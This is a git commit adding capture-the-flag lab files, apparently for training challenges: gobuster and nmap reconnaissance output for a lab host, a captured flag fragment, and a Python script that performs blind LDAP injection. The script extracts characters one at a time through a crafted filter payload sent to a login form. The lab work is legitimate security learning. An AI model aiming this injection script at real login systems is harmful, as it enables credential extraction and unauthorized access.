2025-12-08

2025-12-08 17:15:06 +01:00
parent 0054cc02b1
commit 1b6dfea090
4 changed files with 155 additions and 0 deletions
--- a/AoC/2025/07/gobuster.txt
+++ b/AoC/2025/07/gobuster.txt
@@ -0,0 +1,3 @@
 /terminal            [36m (Status: 302)[0m [Size: 201][34m [--> /unlock][0m
 /unlock              [32m (Status: 200)[0m [Size: 1257]
 /tty                 [36m (Status: 301)[0m [Size: 162][34m [--> http://10.82.133.11/tty/][0m
--- a/AoC/2025/07/nmap_scan.txt
+++ b/AoC/2025/07/nmap_scan.txt
@@ -0,0 +1,104 @@
 # Nmap 7.95 scan initiated Mon Dec  8 07:47:46 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan.txt 10.82.133.11
 Nmap scan report for 10.82.133.11
 Host is up (0.042s latency).
 Not shown: 65531 filtered tcp ports (no-response)
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
 80/tcp    open  http    nginx
 |_http-title: TBFC QA \xE2\x80\x94 EAST-mas
 21212/tcp open  ftp     vsftpd 3.0.5
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to 192.168.156.241
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 3
 |      vsFTPd 3.0.5 - secure, fast, stable
 |_End of status
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_Can't get directory listing: TIMEOUT
 25251/tcp open  unknown
 | fingerprint-strings: 
 |   DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPBindReq, NULL, RPCCheck, SMBProgNeg, X11Probe: 
 |     TBFC maintd v0.2
 |     Type HELP for commands.
 |   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, LDAPSearchReq, RTSPRequest: 
 |     TBFC maintd v0.2
 |     Type HELP for commands.
 |     unknown command
 |     unknown command
 |   Help: 
 |     TBFC maintd v0.2
 |     Type HELP for commands.
 |     Commands: HELP, STATUS, GET KEY, QUIT
 |   Kerberos, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
 |     TBFC maintd v0.2
 |     Type HELP for commands.
 |     unknown command
 |   SIPOptions: 
 |     TBFC maintd v0.2
 |     Type HELP for commands.
 |     unknown command
 |     unknown command
 |     unknown command
 |     unknown command
 |     unknown command
 |     unknown command
 |     unknown command
 |     unknown command
 |     unknown command
 |     unknown command
 |_    unknown command
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 SF-Port25251-TCP:V=7.95%I=7%D=12/8%Time=693674F2%P=aarch64-unknown-linux-g
 SF:nu%r(NULL,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\
 SF:.\n")%r(GenericLines,49,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x
 SF:20commands\.\nunknown\x20command\nunknown\x20command\n")%r(GetRequest,4
 SF:9,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\
 SF:x20command\nunknown\x20command\n")%r(HTTPOptions,49,"TBFC\x20maintd\x20
 SF:v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x
 SF:20command\n")%r(RTSPRequest,49,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x
 SF:20for\x20commands\.\nunknown\x20command\nunknown\x20command\n")%r(RPCCh
 SF:eck,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\n")%
 SF:r(DNSVersionBindReqTCP,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for
 SF:\x20commands\.\n")%r(DNSStatusRequestTCP,29,"TBFC\x20maintd\x20v0\.2\nT
 SF:ype\x20HELP\x20for\x20commands\.\n")%r(Help,4F,"TBFC\x20maintd\x20v0\.2
 SF:\nType\x20HELP\x20for\x20commands\.\nCommands:\x20HELP,\x20STATUS,\x20G
 SF:ET\x20KEY,\x20QUIT\n")%r(SSLSessionReq,39,"TBFC\x20maintd\x20v0\.2\nTyp
 SF:e\x20HELP\x20for\x20commands\.\nunknown\x20command\n")%r(TerminalServer
 SF:Cookie,39,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\n
 SF:unknown\x20command\n")%r(TLSSessionReq,39,"TBFC\x20maintd\x20v0\.2\nTyp
 SF:e\x20HELP\x20for\x20commands\.\nunknown\x20command\n")%r(Kerberos,39,"T
 SF:BFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20c
 SF:ommand\n")%r(SMBProgNeg,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20fo
 SF:r\x20commands\.\n")%r(X11Probe,29,"TBFC\x20maintd\x20v0\.2\nType\x20HEL
 SF:P\x20for\x20commands\.\n")%r(FourOhFourRequest,49,"TBFC\x20maintd\x20v0
 SF:\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x20
 SF:command\n")%r(LPDString,39,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20fo
 SF:r\x20commands\.\nunknown\x20command\n")%r(LDAPSearchReq,49,"TBFC\x20mai
 SF:ntd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nun
 SF:known\x20command\n")%r(LDAPBindReq,29,"TBFC\x20maintd\x20v0\.2\nType\x2
 SF:0HELP\x20for\x20commands\.\n")%r(SIPOptions,D9,"TBFC\x20maintd\x20v0\.2
 SF:\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x20com
 SF:mand\nunknown\x20command\nunknown\x20command\nunknown\x20command\nunkno
 SF:wn\x20command\nunknown\x20command\nunknown\x20command\nunknown\x20comma
 SF:nd\nunknown\x20command\nunknown\x20command\n");
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 Aggressive OS guesses: Linux 5.18 (96%), Linux 5.4 (94%), Cisco Unified Communications Manager VoIP adapter (92%), Linux 2.6.26 (92%), Linux 2.6.18 (89%), Android TV OS 11 (Linux 4.19) (88%), Android 7.1.2 (Linux 3.10) (88%), IPFire 2.25 firewall (Linux 4.14) (88%), IPFire 2.27 (Linux 5.15 - 6.1) (88%), Linux 2.6.32 (88%)
 No exact OS matches for host (test conditions non-ideal).
 Network Distance: 3 hops
 Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
 TRACEROUTE (using port 80/tcp)
 HOP RTT      ADDRESS
 1   42.07 ms 192.168.128.1
 2   ...
 3   42.69 ms 10.82.133.11
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Mon Dec  8 07:52:34 2025 -- 1 IP address (1 host up) scanned in 288.40 seconds
--- a/AoC/2025/07/tbfc_qa_key1
+++ b/AoC/2025/07/tbfc_qa_key1
@@ -0,0 +1 @@
 KEY1:3aster_
--- a/Walkthroughs/LDAPi/script.py
+++ b/Walkthroughs/LDAPi/script.py
@@ -0,0 +1,47 @@
 import requests
 from bs4 import BeautifulSoup
 import string
 import time
 # Base URL
 url = 'http://10.82.144.176/blind.php'
 # Define the character set
 char_set = string.ascii_lowercase + string.ascii_uppercase + string.digits + "._!@#$%^&*()"
 # Initialize variables
 successful_response_found = True
 successful_chars = ''
 headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
 }
 while successful_response_found:
    successful_response_found = False
    for char in char_set:
        #print(f"Trying password character: {char}")
        # Adjust data to target the password field
        data = {'username': f'{successful_chars}{char}*)(|(&','password': 'pwd)'}
        # Send POST request with headers
        response = requests.post(url, data=data, headers=headers)
        # Parse HTML content
        soup = BeautifulSoup(response.content, 'html.parser')
        # Adjust success criteria as needed
        paragraphs = soup.find_all('p', style='color: green;')
        if paragraphs:
            successful_response_found = True
            successful_chars += char
            print(f"Successful character found: {char}")
            break
    if not successful_response_found:
        print("No successful character found in this iteration.")
 print(f"Final successful payload: {successful_chars}")